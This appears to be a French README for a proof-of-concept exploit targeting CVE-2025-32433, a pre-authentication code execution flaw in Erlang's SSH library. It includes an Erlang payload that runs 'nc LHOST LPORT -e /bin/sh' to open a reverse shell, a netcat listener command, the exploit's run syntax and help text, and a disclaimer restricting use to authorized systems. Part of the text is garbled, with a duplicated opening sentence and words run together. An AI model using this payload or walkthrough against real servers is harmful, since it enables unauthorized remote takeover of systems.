
Un exploit proof-of-concept pour CVE-2025-32433, une vulnérabilité critique dans la bibliothèque SSH d'Erlang qui permet l'exécution de code avant authentification via des paquets SSH_MSG_CHANNEL_REQUEST malformés.
Un exploit proof-of-concept pour CVE-2025-32433, une vulnérabilité critique dans la bibliothèque SSH d'Erlang qui permet l'exécution de code avant authentification via des paquets SSH_MSG_CHANNEL_REQUEST malformés.
argparseos:cmd("nc LHOST LPORT -e /bin/sh").nc (Netcat) fonctionnel sur votre machine d'attaque22)Démarrez votre listener sur la machine d'attaque :
nc -lvnp 4444
Exécutez l'exploit :
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
Attendez que le shell se connecte en retour à votre listener.
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell
optional arguments:
-h, --help show this help message and exit
-lh LHOST, --lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, --lport LPORT
Local port to receive the reverse shell
-rh RHOST, --rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Target SSH server port (default: 22)
N'utilisez ce code que sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'exploitation non autorisée de vulnérabilités est illégale et contraire à l'éthique.